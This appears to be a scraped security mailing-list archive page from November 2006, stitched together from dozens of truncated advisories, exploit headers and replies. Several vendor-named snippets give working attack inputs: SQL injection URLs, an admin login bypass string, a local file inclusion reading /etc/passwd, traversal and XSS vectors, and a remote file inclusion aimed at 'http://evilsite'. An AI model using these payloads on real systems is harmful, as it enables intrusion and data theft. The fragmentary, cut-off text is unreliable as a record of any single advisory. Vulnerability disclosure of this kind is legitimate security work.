Aria-Security's Research Team>
#
#Original Advisory at:
#http://www.aria-security.com/forum/showthread.php?t=37
#-
#
#Software: gNews Publisher
#Vendor: http://gazatem.com
#Method: SQL Injection
#
#Poc:
#
#http://target/categories.asp?catID=[SQL Injection]
#
Version: 1.0test53 .. 1.0.rc14 (ie. all 1.0alpha, 1.0beta and 1.0rc
versions in the middle).
0.99.x versions are safe (they don't even have mmap_disable setting).
Problem: When mmap_disable=yes setting is used (not default),
dovecot.index.cache file is read to memory using "file cache" code. It
c
vendor site: http://www.unverse.net/abitwhizzy/
product : aBitWhizzy
bug:local file include
global risk : high
http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
i've allready posted an advisory about that here:
http://www.securityfocus.com/archive/1/450268
regards laurent gaffié
http://s-a-p.ca/
Hi,
The problem/bug that I described below affects SSLv2 servers and clients.
SSLv2 (still an option in the browsers) is vulnerable to this extension
attack.
Thanks.
Regards,
Omirjan Batyrbaev, CTO B3 Security Corp.
[EMAIL PROTECTED]
- Original Message -
From: "Omirjan Batyrbaev" <[EMAIL
==
Secunia Research 21/11/2006
- My Firewall Plus Privilege Escalation Vulnerability -
==
Table of Contents
Affected Software.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
#!/usr/bin/perl
# """
# """ :: ::: """
# """ :: :: :: : ::"""
# """ :: :: : : """
# """:: :: ::: ::: :: :: :: :::: """
# """ :: :: :: : : : :
#!/usr/bin/perl
# """
# """ :: ::: """
# """ :: :: :: : ::"""
# """ :: :: : : """
# """:: :: ::: ::: :: :: :: :::: """
# """ :: :: :: : : : :
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1217-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 20th, 2006
Product: cutenews 1.4.5
Vendor: http://cutephp.com
The Results through security analysis of cutenews
1.4.5
[provided by KAPDA.ir]
--
Test plan:
Manual penetration testing: YES
Using automated tools: NO
Code Auditing: YES
Statistical Results
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
Hi,
The problem/bug that I described below still affects SSLv2 servers and
clients.
SSLv2 (still an option in the browsers) is vulnerable to this extension
attack. SSL v3 and TLS are not affected.
Thanks.
Regards,
Omirjan Batyrbaev, CTO B3 Security Corp.
[EMAIL PROTECTED]
- Original Message -
Hey all,
What started out as a fun project for me turned out some serious results -
"Which is more secure? Oracle vs Microsoft" is a paper I put together
looking at the number of security flaws in the Oracle and MS database
offerings. For those that are interested, you can grab a copy of the re
vendor site: http://enthrallweb.com/
product : eClassifieds
bug:injection sql
risk : medium
injection sql :
/ad.asp?AD_ID='[sql]
/ad.asp?cat_id='[sql]
/dircat.asp?cid='[sql]
/dirSub.asp?sid='[sql]
/ad.asp?cat_id=35&sub_id='[sql]
/ad.asp?cat_id=35&sub_id=102&ad_id='[sql]
laurent gaffié & benjam
#!/usr/bin/perl
# """
# """ :: ::: """
# """ :: :: :: : ::"""
# """ :: :: : : """
# """:: :: ::: ::: :: :: :: :::: """
# """ :: :: :: : : : :
The Week of Oracle Database Bugs
Based on the great idea of H D Moore "Month of Browser
Bugs" and LMH "Month of Kernel Bugs", we are proud to
announce that we are starting on December the "Week of
Oracle Database Bugs" (WoODB).
What is the WoODB about?
An Oracle Database 0day will be released e
Is it me, or do you need to be root or a member of the operator group to
be able to perform an IOCTL on /dev/fw*. In FreeBSD at least, /dev/fw*
is only accessible by root (read/write) and members of the operator
group (read-only).
It might be a bug, I'll grant you that, but it's not disclosure to
On Mon, Nov 20, 2006 at 01:45:45PM -0500, Omirjan Batyrbaev wrote:
> This would have been a problem if the HMAC was just SHA-1(...) or MD5 (...)
> or similar type of prefix HMAC. However, the HMAC used in TLS is more
> involved construct (see RFC 2104) and the attack is not applicable.
It is indee
vendor site: http://www.vspin.net/
product :Classified System
bug:injection sql
risk : medium
injection sql :
/cat.asp?cat='[sql]
/search.asp?in=y&keyword='[sql]
/search.asp?in=y&keyword=1&submit=Search&order='[sql]
/search.asp?in=y&keyword=1&submit=Search&order=tbl_classads.col_id&sort='[sql]
/se
***
# Title : ASPNuke <= 0.80 (register.asp) Remote SQL Injection Vulnerability
# Author : ajann
# S.Page : http://www.aspnuke.com
# D.Page : http://sourceforge.net/project/showfiles.php?group_id=92470
**
This directory traversal has already been discovered.
http://packetstormsecurity.org/0605-exploits/gphotos.txt
f4e2552282a5007bb84e7693bc78dac2 GPhotos versions 1.5 and below suffer from
directory traversal and cross site scripting flaws. Authored By Moroccan
Security
On Sat, Nov 18, 2006 a
"""
""" :: ::: """
""" :: :: :: : ::"""
""" :: :: : : """
""":: :: ::: ::: :: :: :: :::: """
""" :: :: :: : : : :: :: """
"""
Hi,
>
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> ___
>
> Mandriva Linux Security Advisory MDKSA-2006:217
> http://www.mandriva.com/security/
>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-11
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1215-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 20th, 2006
"""
""" :: ::: """
""" :: :: :: : ::"""
""" :: :: : : """
""":: :: ::: ::: :: :: :: :::: """
""" :: :: :: : : : :: :: """
"""
20/11/06
# Produit Vulnérable : mAlbum v0.3
# Site officiel du produit : http://satz.free.fr/
#Vulnérabilitiezz :
1] Multiple Full path disclosure : http://localhost/malbum/index.php?gal=";>
2]Directory traversal :http://localhost/malbum/index.php?gal=../../../
#Screen cap
Indeed! It could offer a potential exploit.
I have released a patched version here:
http://www.dwalker.co.uk/forum/viewtopic.php?t=493
Firewall1954 (at) hotmail (dot) com - it is/would have been good practice to
contact the developer (me) before publishing your find.
If you had approached me wi
Challenge pubblication is 11.02.2006
http://www.digitalarmaments.com/challenge200611849937.html
I. Details
Digital Armaments officially announce the launch of November-December hacking
challenge.
The challenge starts on November 1. For the November-December Challenge,
Digital Armaments will g
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1207-2[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 19th, 2006
Hi,
This would have been a problem if the HMAC was just SHA-1(...) or MD5 (...)
or similar type of prefix HMAC. However, the HMAC used in TLS is more
involved construct (see RFC 2104) and the attack is not applicable.
- Original Message -
From: "Omirjan Batyrbaev" <[EMAIL PROTECTED]>
To:
--Security Report--
Advisory: LDU <= 8.x Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/10/06 09:44 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: Neocrome (http://www.neocrome.net)
Vers
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1214-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 20th, 2006
Hi,
I propose to use envelope method instead of currently used prefix method in
HMAC used in TLS/SSL. The measure is important especially since it was
pointed out that the
NULL cipher suites have a real use and since some ciphers are intentionally
weak. With the NULL cipher (or the easily broken 4
vendor site: http://www.grandora.com/
product : Rialto 1.6
bug:multiples injection sql , login bypass , xss
risk : high !
admin login bypass :
/admin/default.asp
username:' or '1' = '1
passwd: ' or '1' = '1
injection sql :
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
/printmain
#!/usr/bin/perl
# """
# """ :: ::: """
# """ :: :: :: : ::"""
# """ :: :: : : """
# """:: :: ::: ::: :: :: :: :::: """
# """ :: :: :: : : : :
Aplication : Ixprim CMS 1.2
URL
:http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip
variable ixpts.class.php
include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' );
Exploit :
http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1216-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 20th, 2006
"""
""" :: ::: """
""" :: :: :: : ::"""
""" :: :: : : """
""":: :: ::: ::: :: :: :: :::: """
""" :: :: :: : : : :: :: """
"""
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1213-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 19th, 2006
vendor site: http://enthrallweb.us/
product : ehomes
bug:injection sql
risk : medium
injection sql :
/dircat.asp?cid='[sql]
/dirSub.asp?sid='[sql]
/types.asp?TYPE_ID='[sql]
/homeDetail.asp?AD_ID='[sql]
/result.asp?city=1&cat='[sql]
/compareHomes.asp?compare='[sql]
/compareHomes.asp?compare=Compa
"""
""" :: ::: """
""" :: :: :: : ::"""
""" :: :: : : """
""":: :: ::: ::: :: :: :: :::: """
""" :: :: :: : : : :: :: """
"""
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:215
http://www.mandriva.com/security/
___
"""
""" :: ::: """
""" :: :: :: : ::"""
""" :: :: : : """
""":: :: ::: ::: :: :: :: :::: """
""" :: :: :: : : : :: :: """
"""
#!/usr/bin/perl
# """
# """ :: ::: """
# """ :: :: :: : ::"""
# """ :: :: : : """
# """:: :: ::: ::: :: :: :: :::: """
# """ :: :: :: : : : :
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:217
http://www.mandriva.com/security/
___
LS-20061113
LSsec has discovered a vulnerability in
Computer Associates BrightStor ARCserve
Backup v11.5, which could be exploited by
an anonymous attacker in order to execute
arbitrary code with SYSTEM privileges on
an affected system.
The flaw specifically exists within the
Tape Engine (tapeeng
vendor site: http://softacid.net/
product:Link Exchange Lite
bug: injection sql
risk : high
injection sql (post) :
/search.asp
post your sql query into the search engine field
injection sql (get):
/linkslist.asp?psearch='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [EMAIL
#!/usr/bin/perl
# """
# """ :: ::: """
# """ :: :: :: : ::"""
# """ :: :: : : """
# """:: :: ::: ::: :: :: :: :::: """
# """ :: :: :: : : : :
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200611-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
Debian Security Advisory DSA 1218-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
November 21st, 2006
vendor site:http://klf-design.com/
product :klf-realty
bug:injection sql
risk : medium
injection sql :
/search_listing.asp?category='[sql]
/detail.asp?property_id='[sql]
/search_listing.asp?agent='[sql]
laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
"""
""" :: ::: """
""" :: :: :: : ::"""
""" :: :: : : """
""":: :: ::: ::: :: :: :: :::: """
""" :: :: :: : : : :: :: """
"""
===
Ubuntu Security Notice USN-384-1 November 20, 2006
openldap2.2 vulnerability
CVE-2006-5779
===
A security issue affects the following Ubuntu releases:
Ubuntu 5.10
Ubuntu 6
A terminology question for people.
In this reference:
BUGTRAQ:20061115 Re: DragonFlyBSD all versions FireWire IOCTL kernel integer
overflow information disclousure
http://www.securityfocus.com/archive/1/archive/1/451677/100/0/threaded
The issue is being described as an integer overflow.
I
On Tue, 2006-11-21 at 15:38 +, [EMAIL PROTECTED] wrote:
> i've allready posted an advisory about that here:
>
> http://www.securityfocus.com/archive/1/450268
>
>
>
> regards laurent gaffi
> http://s-a-p.ca/
>
The GLSA is a notice to Gentoo users that the package in question had a
vulnerab
Error PostNuke in the variable stop which can be exploited by malicious
people to disclose system information. Luckily the vulnerability
affects to the 0.7.5.0 version and minors.
POC:
http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value)
Example:
http://www.dev-postnuke.com/us
===
Ubuntu Security Notice USN-381-1 November 16, 2006
firefox vulnerabilities
CVE-2006-5462, CVE-2006-5463, CVE-2006-5464, CVE-2006-5747,
CVE-2006-5748
===
A security issue af
===
=Bug was found in the part of phpBB
=
=Dork : "Powered by Dimension"
=
=Expl : includes/functions.php?phpbb_root_path=
=
=Source Code : http://www.xs4all.nl/~hkicken/plusxl20/phpbb2_plusxl_20_272.zip
=
=Found by : Ren
#!/usr/bin/perl
# """
# """ :: ::: """
# """ :: :: :: : ::"""
# """ :: :: : : """
# """:: :: ::: ::: :: :: :: :::: """
# """ :: :: :: : : : :
vendor site: http://www.creascripts.com/
product:creadirectory
bug: injection sql & xss
risk : medium
injection sql:
/search.asp?search=1&submit=Search&category='[sql]
xss:
/addlisting.asp?cat=[xss]
/search.asp?search=[xss]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PRO
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ContentNow CMS 1.39 'pageid' Sql Injection + Path Disclosure
Severity : Medium Risk
Vendor : http://www.contentnow.mf4k.de/
Author : Revenge
[--]
[#] Description
ContentNow is a PHP Content Manage
vendor site: http://www.rockfordarea.com/
product : The Classified Ad System
bug: multiple xss (get) & injection sql
risk : medium
injection sql (get):
/default.asp?action=view&main='[sql]
injection sql (post) :
just post your query into the search engine
xss :
/default.asp?action=view1&cat=[
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2006:216
http://www.mandriva.com/security/
___
"""
""" :: ::: """
""" :: :: :: : ::"""
""" :: :: : : """
""":: :: ::: ::: :: :: :: :::: """
""" :: :: :: : : : :: :: """
"""
> -Original Message-
> From: Reversemode [mailto:[EMAIL PROTECTED]
> Sent: Thursday, November 16, 2006 11:15 AM
> To: Securityfocus
> Subject: [Reversemode advisory] Computer Associates HIPS
> Drivers - multiple local privilege escalation vulnerabilities.
>
>
> Computer Associates "Ho
vendor site:http://www.jiros.net/
product:JiRos Links Manager
bug: injection sql & xss
risk : medium
injection sql:
/openlink.asp?LinkID='[sql]
/viewlinks.asp?CategoryID='[sql]
xss permanent (post):
in: /submitlink.asp
-Link Name:
-Link URL:
-Link Image:
-Link Description:
those xss are reall
"""
""" :: ::: """
""" :: :: :: : ::"""
""" :: :: : : """
""":: :: ::: ::: :: :: :: :::: """
""" :: :: :: : : : :: :: """
"""
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256
- - ---
VMware Security Advisory
Advisory ID: VMSA-2006-0010
Synopsis: SSL sessions not authenticated by VC Clients
Patch URL:http://www.vmware.com/dow
===
Ubuntu Security Notice USN-382-1 November 16, 2006
mozilla-thunderbird vulnerabilities
CVE-2006-5462, CVE-2006-5463, CVE-2006-5464, CVE-2006-5747,
CVE-2006-5748
===
A secur
#!/usr/bin/perl
#
#
#Shopping_Catalog
--Security Report--
Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/10/06 09:44 PM
---
Contacts:{
ICQ: 10072
MSN/Email: [EMAIL PROTECTED]
Web: http://www.nukedx.com
}
---
Vendor: Neocrome (http://www.neocrome.net)
vendor site: http://www.4u2ges.com/
product : Rapid Classified v3.1
bug: multiple xss (get) & injection sql
risk : medium
injection sql :
/viewad.asp?id='[sql]
xss :
/reply.asp?id=[xss]
/view_print.asp?id=[xss]
/search.asp?categoryName=1&SH1=[xss]
/reply.asp?id=5012081548011&name=[xss]
/advs
76 matches
Mail list logo
